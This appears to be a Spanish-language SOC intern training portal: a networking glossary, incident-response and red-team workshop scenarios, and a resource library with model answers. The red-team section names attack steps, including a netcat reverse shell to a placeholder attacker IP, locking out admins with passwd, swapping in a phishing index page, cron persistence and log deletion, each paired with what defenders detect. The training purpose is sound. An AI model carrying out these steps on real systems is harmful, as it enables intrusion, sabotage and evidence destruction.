Glosario de Inducción del SOC
Su vocabulario fundamental. Revise la pestaña "Recursos" para explicaciones detalladas.
Términos Fundamentales
- Dirección IP (IPv4/IPv6)
- Identificador numérico único para dispositivos en una red. (Ver: Guía IP, Fundamentos)
- Modelo OSI
- Modelo teórico de 7 capas (Física, Enlace, Red, Transporte, Sesión, Presentación, Aplicación) para entender la comunicación de redes. (Ver: Protocolos, Fundamentos)
- Modelo TCP/IP
- Modelo práctico de 4 capas (Acceso a Red, Internet, Transporte, Aplicación) sobre el que funciona Internet. (Ver: Protocolos, Fundamentos)
- Protocolo
- Conjunto de reglas que definen cómo se comunican los dispositivos. (Ver: Fundamentos, Protocolos)
- TCP (Protocolo de Control de Transmisión)
- Protocolo de Capa 4, fiable y orientado a conexión (como correo certificado). (Ver: Fundamentos, Protocolos)
- UDP (Protocolo de Datagramas de Usuario)
- Protocolo de Capa 4, rápido y no fiable (como tarjeta postal). (Ver: Fundamentos, Protocolos)
- Puerto de Red
- Identificador numérico (0-65535) que dirige el tráfico a una aplicación específica en un dispositivo. (Ver: Fundamentos)
- Socket
- Combinación de una Dirección IP y un Puerto, creando un punto final de comunicación único (ej.
192.168.1.1:443). (Ver: Fundamentos) - DNS (Sistema de Nombres de Dominio)
- La "agenda telefónica" de Internet. Traduce nombres de dominio (
cybervaltorix.com) a direcciones IP. (Ver: Recursos) - NetID y HostID
- Las dos partes de una IP: el NetID identifica la red y el HostID identifica al dispositivo en esa red. (Ver: Recursos)
- IP Pública vs. Privada
- Pública (única en Internet) vs. Privada (reutilizable en redes locales, ej.
192.168.x.x). (Ver: Recursos) - NAT (Network Address Translation)
- Permite a múltiples dispositivos en una red privada compartir una única IP pública. (Ver: Recursos)
- Subnetting (Subredes)
- Técnica de dividir una red grande en redes más pequeñas (subredes) para mejorar la organización y seguridad. (Ver: Recursos)
- Máscara de Subred
- Número (ej.
255.255.255.0o/24) que define qué porción de una IP es el NetID y qué porción es el HostID. (Ver: Recursos) - VLSM (Máscara de Subred de Longitud Variable)
- Técnica avanzada de subnetting que permite crear subredes de diferentes tamaños para maximizar la eficiencia de IPs. (Ver: Recursos)
- Encapsulación
- Proceso de "envolver" datos con encabezados de control a medida que bajan por las capas del modelo de red. (Ver: Recursos)
- PDU (Unidad de Datos de Protocolo)
- El nombre genérico de los "datos" en cada capa: Trama (Capa 2), Paquete (Capa 3), Segmento/Datagrama (Capa 4). (Ver: Recursos)
Talleres de Operaciones de Seguridad (SOC) - Nivel Pasante
DE: CISO, CYBER VALTORIX S.A. DE C.V.
Instrucciones de los Talleres
Tienen tiempo asignado para completar estos escenarios. Los documentos en la pestaña "Recursos" son su base teórica. Esta es la aplicación práctica.
No busquen "la respuesta correcta". Quiero su análisis, su proceso de pensamiento y las acciones de contención que proponen. Usen el modelo "Maestro/Estudiante": preparen su solución y estén listos para defenderla.
Escenario 1: El Diagnóstico (OSI/TCP-IP)
Tiempo Estimado: 20 minutos
Situación
Reciben dos tickets de soporte simultáneamente:
- Ticket A: Un usuario (
192.168.1.50) se queja de quehttp://intranet.cybervaltorix.local(10.10.30.5) carga "extremadamente lento". - Ticket B: Otro usuario (
192.168.1.52) reporta que no puede acceder a\\srv-files.cybervaltorix.local(10.10.40.10). Unpingfalla con "Destination Host Unreachable".
Su Tarea
Son Nivel 1. Aísles el problema desde su máquina Kali (192.168.1.0/24).
Entregables
- Proceso de Diagnóstico: Pasos y comandos para ambos tickets.
- Aislamiento de Capa: ¿Qué capa (TCP/IP) es la sospechosa para el Ticket A? ¿Y para el Ticket B?
- Herramientas: ¿Qué comandos (
ping,traceroute, etc.) usarían?
Escenario 2: El Vector de Ataque (DNS)
Tiempo Estimado: 20 minutos
Situación
Monitoreando logs de firewall. El Resolver DNS interno es 172.16.10.5. Una laptop (172.16.20.100) muestra tráfico anómalo:
... 172.16.20.100:34876 -> 8.8.8.8:53 ... ALLOWED
... 172.16.20.100:34877 -> 1.1.1.1:53 ... ALLOWED
... 172.16.20.100:41982 -> 198.51.100.50:53 ... ALLOWED
198.51.100.50 es un resolver desconocido en Rusia. El tráfico es constante y las consultas parecen sin sentido (ej. aHR0...com).
Su Tarea
- Analizar y explicar el evento.
- Proponer contención inmediata (firewall).
Entregables
- Análisis de Amenaza: ¿Riesgo? ¿Por qué es malo usar
8.8.8.8? ¿Qué es el tráfico a198.51.100.50? - Política de Contención: Escriba la política de firewall de egreso (Origen, Destino, Puerto) para neutralizar y prevenir esto.
- Simulación (Opcional): ¿Qué comando de Kali usaría para simular esta consulta anómala?
Escenario 3: La Segmentación (Subnetting y ACLs)
Tiempo Estimado: 20 minutos
Situación
Implementando política "Zero Trust" en el firewall que segmenta las subredes VLSM.
Las Zonas de Red:
- Zona 1 (Invitados):
192.168.10.0/24 - Zona 2 (Corporativa):
192.168.20.0/25 - Zona 3 (Desarrollo):
192.168.20.128/26 - Zona 4 (Servidores):
192.168.30.0/27192.168.30.10= Servidor Archivos (SMB, 445/TCP)192.168.30.15= Servidor BD (SQL, 1433/TCP)
Su Tarea
Definir la matriz de reglas de firewall (ACLs) que controla el tráfico entre estas zonas.
Entregables
- Principio Rector: ¿Cuál es la primera regla que debe existir en cualquier política de firewall entre zonas?
- Matriz de ACLs: Defina qué tráfico está permitido/denegado. (Ej. ¿Zona 2 a Zona 4? ¿Zona 1 a cualquier otra?).
- Prueba de Verificación (Kali): ¿Qué comando usaría desde Zona 1 para probar que su bloqueo a Zona 4 es efectivo?
Escenario 4: Análisis de DNS, VLSM e Incidentes (Taller 2)
Tiempo Estimado: 45 minutos
Sección 1: Fundamentos Operativos de DNS
Responda las siguientes preguntas basándose en el material de recursos.
- El Gerente de Marketing: Un gerente le pregunta: "¿Qué es el DNS y por qué Tl habla tanto de él?" Explíquelo en términos sencillos, enfocándose en por qué es crítico para el negocio.
- El Arquitecto de Redes: Un arquitecto pregunta: "¿Por qué necesito abrir tanto UDP como TCP en el puerto 53? ¿No era DNS solo UDP?" Justifique la necesidad de ambos.
- Análisis de Proceso: Describa la diferencia fundamental entre una consulta DNS recursiva y una iterativa. ¿Cuál inicia su laptop y cuál realiza nuestro resolver interno?
Sección 2: Escenarios de Ataque DNS
Analice los siguientes escenarios.
- Escenario (Pharming): Varios usuarios reportan que al escribir
www.nuestro-banco-asociado.com, llegan a un sitio clonado que pide "verificar" su información. ¿Cuál es el ataque más probable? ¿El problema está en la laptop o en un servidor? - Escenario (DDoS): El NOC reporta que nuestro servidor web está saturado por un volumen masivo de respuestas DNS anormalmente grandes. ¿Qué tipo de ataque DDoS es este? ¿Por qué el atacante usaría servidores de terceros?
- Mitigación Estratégica: El material menciona una tecnología con firmas criptográficas para proteger la integridad de las respuestas DNS. ¿Cómo se llama? ¿Cómo habría prevenido el ataque del Escenario 4?
Sección 3: VLSM y Gestión de IP
Resuelva los siguientes problemas de diseño.
- El Problema de Negocio: ¿Cuál es el problema de negocio (eficiencia y costo) que resuelve VLSM en comparación con el subneteo de tamaño fijo (FLSM)?
- Ejercicio de Diseño (VLSM): Se le asigna el bloque
10.100.50.0/24. Debe crear 3 subredes:- Subred A (Ventas): Necesita 50 direcciones IP para hosts.
- Subred B (Invitados): Necesita 25 direcciones IP para hosts.
- Subred C (Enlaces WAN): Necesita 2 direcciones IP para hosts.
Indique qué máscara de subred (ej. /25, /30...) asignaría a cada subred (A, B y C) para cumplir los requisitos sin desperdiciar direcciones.
Sección 4: Escenario de Incidente Combinado
Son las 3:00 AM. El NOC reporta un DDoS (SYN Flood) que satura el enlace. El sitio web está caído. Al mismo tiempo, el SIEM alerta: WEB-PROD-01 está conectándose a una IP de C2 conocida en Rusia (82.146.35.190). Al acceder al servidor, nota un proceso escuchando en el puerto TCP/31337.
- Triaje (Priorización): Tiene dos problemas: servicio caído (DDoS) y servidor comprometido (C2). ¿Qué atiende primero? ¿Cómo maneja ambos? Justifique.
- Herramientas (DDoS): ¿Qué tipo de tecnología o servicio usaría para mitigar el DDoS volumétrico?
- Herramientas (Intrusión): Está en la terminal de
WEB-PROD-01.- ¿Qué comando usaría para identificar qué proceso (PID y nombre) está escuchando en
TCP/31337? - ¿Qué comando usaría para confirmar la conexión saliente a la IP del C2?
- ¿Qué comando usaría para identificar qué proceso (PID y nombre) está escuchando en
- Contención y Persistencia: El DDoS es una "cortina de humo". ¿Cuál es su primera acción de contención sobre
WEB-PROD-01? ¿Por qué no debe simplemente apagar el servidor?
Escenario 5: "El Peor Día" (Recuperación de Control)
Equipo Azul - Respuesta a Incidentes
Situación: 10. "El Peor Día"
Es lunes, 9:00 AM. Clientes reportan que nuestro sitio (www.esit-pasantes.com) es una página de phishing pidiendo tarjetas de crédito. TI confirma que no pueden iniciar sesión en WEB-PROD-01; sus contraseñas de admin y root han sido cambiadas. Han perdido el control.
Hipótesis: Atacante obtuvo credenciales de Administrador, tomó control total, modificó el sitio y bloqueó al equipo de TI.
Su Misión (Equipo Azul): Desarrollar un plan de acción de 3 fases: Contener, Recuperar y Erradicar.
FASE A: CONTENCIÓN (Detener el fraude AHORA)
Menú de Herramientas/Acciones:
- Firewall de Red (ACLs): Bloquear la IP del servidor
WEB-PROD-01. - Consola del Hipervisor (vSphere/Hyper-V): "Desconectar" la tarjeta de red virtual (vNIC) del servidor.
- Registrador de DNS Público: Cambiar el registro DNS
www.esit-pasantes.compara que apunte a una IP de "página en mantenimiento" (servidor limpio) o a0.0.0.0(sinkhole). - Desconectar el Servidor: Ir al data center y desconectar el cable físico.
Su Tarea (A):
Priorice las acciones del menú. ¿Cuál es la acción MÁS RÁPIDA y EFECTIVA para detener el fraude al cliente? ¿Por qué las otras opciones son peores o más lentas?
FASE B: RECUPERACIÓN DE ACCESO
Menú de Herramientas/Acciones:
- Restauración desde Respaldo: Borrar la VM comprometida y restaurarla desde un respaldo limpio conocido de anoche.
- Modo de Recuperación del SO: Reiniciar el servidor en modo de un solo usuario/recuperación para resetear la contraseña de root/admin a la fuerza.
- Active Directory (AD): Resetear la cuenta del administrador de dominio comprometido.
Su Tarea (B):
¿Cuál es la ÚNICA acción de recuperación aceptable para un servidor que fue comprometido a este nivel? ¿Por qué las otras opciones son un error grave de seguridad?
FASE C: ERRADICACIÓN Y ANÁLISIS (Encontrar al 'Paciente Cero')
Menú de Herramientas/Acciones:
- Logs del Servidor Web (IIS/Apache): Analizar quién accedió al servidor.
- Logs del Sistema (Event Logs / syslog): Buscar eventos de inicio de sesión (ID 4624) y cambios de contraseña.
- Logs del Gateway de Email: Buscar el email de phishing que originó todo.
- Análisis Forense: Analizar la VM en cuarentena.
Su Tarea (C):
Ordene estas acciones. ¿Cuál es la Prioridad #1 para entender cómo sucedió y evitar que se repita?
Escenario 6: "El Cazador" (Simulación de Equipo Rojo)
Equipo Rojo - Pentesting
Equipo y Misión
Equipo: Esta tarea es para el equipo de pentesting (Equipo Rojo). El Equipo Azul (resto de pasantes) estará en modo defensivo.
Misión: Su trabajo es causar el incidente del Escenario 5. Comprometer WEB-PROD-01 (en sandbox), bloquear a los administradores y suplantar el sitio web.
Reglas de Enfrentamiento (ROE): No atacar producción. El objetivo es simular un adversario realista para que el Equipo Azul practique la detección y respuesta.
FASE 1: RECONOCIMIENTO Y ACCESO INICIAL
Objetivo: Encontrar una forma de entrar (ej. phishing a un admin).
Menú de Tácticas/Herramientas:
- OSINT: Usar Google, LinkedIn para descubrir correos de administradores de
esit-pasantes.com. - Escaneo de Red (Nmap): Escanear
WEB-PROD-01en busca de puertos abiertos (RDP, SSH, admin panels). - Análisis de Vulnerabilidades (OpenVAS/Nessus): Buscar CVEs en los servicios encontrados.
- Ingeniería Social (Phishing Simulado): Preparar correo a un admin con un enlace/payload.
Su Tarea (Fase 1):
Describan cómo identificarían a su objetivo y qué método de "Acceso Inicial" elegirían.
FASE 2: COMPROMISO Y ESCALADA
Objetivo: Obtener control (root/Admin) de la máquina.
Menú de Tácticas/Herramientas:
- Listener (netcat/Metasploit): Iniciar un "listener" (
nc -lvp [puerto]) en su máquina de ataque para "atrapar" la conexión entrante. - Shell Inversa (Reverse Shell): Su payload ejecutará una shell que se conecta *desde* la víctima *hacia* su listener.
- Escalada de Privilegios: Buscar contraseñas en archivos, permisos incorrectos (
sudo -l), exploits de kernel.
Su Tarea (Fase 2):
¿Cuál es la diferencia clave entre una shell "directa" (bind shell) y una "inversa" (reverse shell), y por qué los atacantes prefieren la inversa?
FASE 3: POST-EXPLOTACIÓN Y LOGRO DE OBJETIVOS
Objetivo: Cumplir la misión: cambiar el sitio y bloquear admins.
Menú de Tácticas/Herramientas:
- Movimiento Lateral: ¿Pueden usar las credenciales para moverse al Controlador de Dominio (AD)?
- Persistencia: Asegurar el re-acceso (ej.
cronjoben Linux, Tarea Programada en Windows). - Cambio de Contraseñas: Ejecutar
passwd(Linux) onet user(Windows) para bloquear a los admins. - Suplantación: Reemplazar el
index.html(ej.mv phishing.html /var/www/html/index.html). - Limpieza de Huellas: Borrar logs (
/var/log, Event Logs).
Su Tarea (Fase 3):
Describan los comandos (a nivel de concepto) que usarían. ¿Qué "ruido" (señales) creen que generarán y que el Equipo Azul podría detectar?
Biblioteca de Recursos del SOC
Análisis detallado de los conceptos clave. Use esto para resolver los escenarios de capacitación.
Fundamentos: Modelos OSI y TCP/IP
¿Qué son?
Son "manuales de instrucciones" conceptuales que dividen la compleja comunicación de red en capas. No son protocolos físicos, sino una forma de entender cómo deberían funcionar los protocolos.
Relevancia Operativa (CISO)
Usamos el Modelo OSI diariamente para aislar problemas. Si un usuario no puede acceder a un sitio (Ticket A), ¿el problema es de Capa 1 (cable), Capa 3 (enrutamiento/firewall) o Capa 7 (aplicación web caída)? Saber esto evita perder tiempo.
Fundamentos: IP y Subnetting
¿Qué es?
El sistema de "direcciones postales" de la red. El Subnetting es la técnica para dividir un gran "código postal" (red) en "barrios" más pequeños (subredes) para organizar el tráfico y mejorar la seguridad.
Relevancia Operativa (CISO)
El Subnetting es nuestra principal herramienta de segmentación de seguridad. (Ver Escenario 3). Al poner a los "Invitados" en una subred (192.168.10.0/24) y a los "Servidores" en otra (192.168.30.0/27), podemos crear reglas de firewall para que NUNCA puedan hablar entre sí.
Fundamentos: DNS
¿Qué es?
La "agenda telefónica" de Internet. Traduce nombres fáciles de recordar (cybervaltorix.com) a las direcciones IP que usan las máquinas.
Relevancia Operativa (CISO)
El DNS es un vector de ataque principal (Ver Escenario 2). El malware lo usa para "llamar a casa" (C2) o para robar datos (Tunelización de DNS). Por eso, en un SOC, monitoreamos y controlamos el tráfico DNS.
Análisis Profundo: DNS (Taller 2)
Tipos de Registros DNS Comunes
Un servidor DNS almacena diferentes tipos de "registros". Estos son los fundamentales que deben conocer:
| Registro | Nombre Completo | Función | Ejemplo de Valor |
|---|---|---|---|
| A | Address | Asocia un dominio a una dirección IPv4. | 172.217.14.228 |
| AAAA | Quad A | Asocia un dominio a una dirección IPv6. | 2607:f8b0:400a:80e::200e |
| CNAME | Canonical Name | Crea un alias. Apunta un dominio a otro dominio. | mail.google.com |
| MX | Mail Exchange | Especifica el servidor de correo para un dominio. | 10 smtp.google.com |
| NS | Name Server | Indica qué servidor DNS es autoritativo. | ns1.ejemplo.com |
| TXT | Text | Permite insertar texto. Se usa para SPF, DKIM. | "v=spf1 include..." |
Proceso de Resolución: Recursiva vs. Iterativa
- Consulta Recursiva
- El cliente (su PC) le pregunta al Solucionador Recursivo (ej.
8.8.8.8) y le dice: "Encuentra esta IP por mí y no me molestes hasta que la tengas". El cliente es "flojo". - Consulta Iterativa
- El Solucionador Recursivo hace el trabajo. Pregunta a otros servidores (Raíz, TLD, Autoritativo) de forma iterativa, donde cada servidor le da una pista de "a quién preguntar después".
Ejemplo de Búsqueda DNS (Paso a Paso)
- PC > Resol. Recursivo: Su PC pregunta a
8.8.8.8: "¿Quién eswww.ejemplo.com?" - Resol. Recursivo > Servidor Raíz (.):
8.8.8.8no lo sabe, pregunta al Servidor Raíz (.). - Servidor Raíz > Resol. Recursivo: El Raíz responde: "No lo sé, pero aquí está la IP del servidor TLD de
.com." - Resol. Recursivo > Servidor TLD (.com):
8.8.8.8pregunta al servidor.com: "¿Quién eswww.ejemplo.com?" - Servidor TLD > Resol. Recursivo: El TLD
.comresponde: "No lo sé, pero aquí está la IP del servidor autoritativo paraejemplo.com." - Resol. Recursivo > Servidor Autoritativo (ejemplo.com):
8.8.8.8pregunta al servidor deejemplo.com. - Servidor Autoritativo > Resol. Recursivo: El servidor autoritativo responde: "¡Yo sí lo sé!
www.ejemplo.comestá en192.168.1.1." - Resol. Recursivo > PC: El servidor
8.8.8.8le da la respuesta (192.168.1.1) a su PC.
Protocolo y Puerto: UDP/53 vs. TCP/53
UDP/53 (Rapidez): Se usa para la gran mayoría de las consultas estándar (cliente a servidor). La consulta y la respuesta son pequeñas (menos de 512 bytes) y caben en un solo paquete. Se prioriza la velocidad.
TCP/53 (Fiabilidad): Se usa para respuestas grandes o transferencias críticas:
- Transferencias de Zona: Cuando un DNS primario replica su "agenda" completa a los secundarios. Debe ser fiable.
- DNSSEC: Cuando se usan Extensiones de Seguridad, las respuestas incluyen firmas criptográficas, haciéndolas mucho más grandes. UDP no puede manejarlas y se "cae" (fallback) a TCP.
Análisis Profundo: Amenazas DNS (Taller 2)
Envenenamiento de Caché DNS (Pharming)
Un atacante engaña a un servidor DNS recursivo para que acepte una respuesta falsa. El servidor guarda (envenena) esta respuesta en su caché. Cualquier usuario que consulte ese servidor será redirigido a una IP maliciosa.
| Estado de Caché | Dominio Solicitado | IP Devuelta | Resultado |
|---|---|---|---|
| Legítima | mibanco.com |
203.0.113.10 |
El usuario va al banco real. |
| Envenenada | mibanco.com |
198.51.100.55 |
El usuario va al sitio falso del atacante. |
Ataque de Amplificación de DNS (DDoS)
El atacante usa una botnet para enviar miles de pequeñas consultas DNS a servidores abiertos, pero falsifica (spoofing) la IP de origen para que sea la de la víctima. Diseña la consulta para que genere una respuesta muy grande.
| Tráfico | Tamaño | Descripción |
|---|---|---|
| Petición del Atacante | ~60 bytes | Una consulta DNS pequeña y falsificada. |
| Respuesta del Servidor | ~3000-4000 bytes | Una respuesta DNS legítima pero muy larga. |
| Factor de Amplificación | > 50x | El atacante multiplica su efecto por 50. |
Solución: DNSSEC
Problema: Originalmente, el DNS no era seguro. Las respuestas no estaban firmadas.
Solución: DNSSEC (Extensiones de Seguridad de DNS) agrega firmas criptográficas. Permite a un cliente verificar que la respuesta que recibe es auténtica (integridad de los datos) y no ha sido manipulada, creando una "cadena de confianza" desde el servidor raíz.
Análisis Profundo: VLSM (Taller 2)
Subnetting Tradicional vs. VLSM
VLSM (Máscara de Subred de Longitud Variable) resuelve el desperdicio masivo de IPs. El subneteo tradicional (FLSM) usa un tamaño fijo, VLSM usa tamaños variables.
| Característica | Subnetting Tradicional (FLSM) | VLSM (Variable Length) |
|---|---|---|
| Tamaño de Subred | Fijo. Todas las subredes son iguales. | Variable. Se adaptan a la necesidad. |
| Eficiencia IP | Baja. Mucho desperdicio en redes pequeñas. | Alta. Mínimo desperdicio. |
| Ejemplo de Máscara | 192.168.1.0/26, 192.168.1.64/26... |
192.168.1.0/26, 192.168.1.64/27... |
Ejemplo Práctico de Configuración VLSM
Se nos asigna el bloque 192.168.10.0/24. Se ordena de mayor a menor requisito:
- LAN A (Ventas): 100 hosts -> $2^7-2 = 126$ -> /25
- LAN B (Ingeniería): 50 hosts -> $2^6-2 = 62$ -> /26
- LAN C (Servidores): 20 hosts -> $2^5-2 = 30$ -> /27
- WAN 1 (Enlace): 2 hosts -> $2^2-2 = 2$ -> /30
| Red | Req. Hosts | Hosts Disp. | Máscara | ID de Red | Rango Utilizable | Broadcast |
|---|---|---|---|---|---|---|
| LAN A | 100 | 126 | /25 |
192.168.10.0 |
.1 - .126 |
.127 |
| LAN B | 50 | 62 | /26 |
192.168.10.128 |
.129 - .190 |
.191 |
| LAN C | 20 | 30 | /27 |
192.168.10.192 |
.193 - .222 |
.223 |
| WAN 1 | 2 | 2 | /30 |
192.168.10.224 |
.225 - .226 |
.227 |
| Libre | - | - | - | .228 - .255 |
- | - |
Análisis Profundo: Respuesta a Incidentes (Taller 4)
Triaje (Priorización) de Incidentes
En un ataque combinado, la prioridad es detener la brecha de datos. Un DDoS (disponibilidad) pierde ingresos; una brecha de C2 (confidencialidad/integridad) pierde datos, reputación y genera multas.
- Equipo de Redes/Infra:
- Inicia la llamada al proveedor de mitigación de DDoS (ISP, CDN, o servicio de scrubbing). Un DDoS volumétrico no se frena en el firewall local, el enlace ya está saturado.
- Equipo de IR/Seguridad:
- Se enfoca inmediatamente en contener el servidor comprometido (
WEB-PROD-01) para detener la exfiltración o el movimiento lateral.
Análisis de Intrusión en Vivo (Linux)
Cuando un servidor está comprometido, se usan herramientas de línea de comandos para entender qué está pasando antes de apagarlo.
netstat -tulnposs -tulnp- Comandos para ver todos los puertos (t)TCP y (u)UDP que están (l)escuchando, mostrando el (p)nombre del proceso/PID y sin resolver (n)nombres (más rápido).
# netstat -tulnp | grep 31337 tcp 0 0 0.0.0.0:31337 0.0.0.0:* LISTEN 1234/kworker netstat -anposs -anp- Muestra (a)todas las conexiones (escuchando y activas), sin resolver (n)nombres y mostrando el (p)proceso.
# netstat -anp | grep 82.146.35.190 tcp 0 0 10.10.1.5:48122 82.146.35.190:443 ESTABLISHED 1234/kworker
Contención: ¿Por qué NO apagar el servidor?
¡Evidencia Volátil! Apagar un servidor comprometido es uno de los peores errores en la respuesta a incidentes. Se destruye toda la evidencia en la memoria RAM:
- Procesos maliciosos en ejecución.
- Conexiones de red activas (como la del C2).
- Claves de cifrado usadas por el malware.
- Comandos ejecutados.
Acción Correcta: Aislar el servidor (desconectar el cable, mover a VLAN de cuarentena, o aplicar reglas de firewall EDR) y luego tomar una imagen forense de la RAM (ej. con `lime`) y del disco para análisis.
Análisis Profundo: "El Peor Día" (Taller 5)
Solución: FASE A (Contención)
Respuesta Clave: La acción más rápida y efectiva es la #3: Cambiar el Registro DNS Público.
- Proceso de Pensamiento:
- El fraude está ocurriendo en el dominio público. Cambiar el DNS en nuestro registrador (Cloudflare, GoDaddy) es casi instantáneo y desvía *globalmente* a todos los clientes a una página de mantenimiento. Detiene la hemorragia de inmediato.
- ¿Por qué NO las otras?
- #1 (Firewall) y #2 (vNIC) son buenas para aislar el servidor, pero son más lentas y no detienen el fraude a clientes que ya tienen el DNS cacheado. #4 (Cable Físico) es la más lenta y requiere acceso físico.
- Estrategia Correcta (CISO):
- Hacer #3 (DNS) y #2 (vNIC) simultáneamente. #3 protege al cliente, #2 aísla el servidor para análisis.
Solución: FASE B (Recuperación)
Respuesta Clave: La única respuesta aceptable es la #1: Restauración desde Respaldo.
- Proceso de Pensamiento:
- El Riesgo de "Resetear" (#2): Esto es un error de novato. Asumir que un atacante que obtuvo control de root no dejó múltiples backdoors (rootkits, cronjobs) es una negligencia grave. Resetear la contraseña es inútil.
- La Regla de Oro: Un sistema comprometido a nivel de administrador NUNCA se confía de nuevo. Se le trata como "radioactivo". Se "pavimenta" (se borra) y se restaura desde una copia limpia conocida.
Solución: FASE C (Análisis)
Respuesta Clave: El plan de caza debe enfocarse en encontrar la fuente.
- Prioridad 1: #3 (Logs del Gateway de Email)
- La hipótesis es phishing. La prioridad es encontrar ese email, identificar quién lo recibió (el "paciente cero") y qué otras máquinas podrían estar comprometidas.
- Prioridad 2: #2 (Logs del Sistema)
- Identificado el admin, revisar todos sus inicios de sesión (Event ID 4624) en servidores críticos para entender el movimiento lateral.
- Acción Clave Post-Incidente:
- Resetear TODAS las credenciales de administrador de dominio por precaución y mejorar los filtros de email.
Análisis Profundo: Tácticas de Equipo Rojo (Taller 6)
Solución: FASE 2 (Shell Directa vs. Inversa)
Respuesta Clave: Los atacantes prefieren la Shell Inversa (Reverse Shell).
- Shell Directa (Bind Shell):
- El atacante abre un puerto (ej. 31337) en la MÁQUINA VÍCTIMA y se conecta a ella. Esto es ruidoso y fácil de bloquear, ya que los firewalls corporativos bloquean casi todo el tráfico *entrante* no solicitado.
- Shell Inversa (Reverse Shell):
- El payload hace que la MÁQUINA VÍCTIMA inicie una conexión *saliente* hacia la máquina del atacante (ej. al puerto 443). Esto se disfraza como tráfico web normal (HTTPS) y casi siempre está permitido por los firewalls.
Solución: FASE 3 (Generar "Ruido" / Señales)
El trabajo del Equipo Rojo es generar señales que el Equipo Azul (BA) debe detectar. Aquí está el "ping-pong":
| Acción del Equipo Rojo (RR) | Señal / Detección del Equipo Azul (BA) |
|---|---|
Inicia Shell Inversa (ej. nc [IP_ATACANTE] 443) |
Debería verla con netstat -anp o ss -anp (como en el Taller 4). |
Ejecuta passwd admin o net user admin ... |
Debería ver "Evento 4724" (Cambio de contraseña) en Logs de Eventos o actividad en /var/log/secure. |
Reemplaza index.html (ej. mv ...) |
Debería (idealmente) tener un Monitor de Integridad de Archivos (FIM) que alerte. O... los clientes llaman. |
Intenta Movimiento Lateral (ej. ssh dc01) |
Debería ver un "Evento 4625" (Inicio de sesión fallido) en el servidor DC01. |
Terminal Simulada del SOC
Practique los comandos de los escenarios. Escriba help para ver los comandos disponibles.
help para comenzar.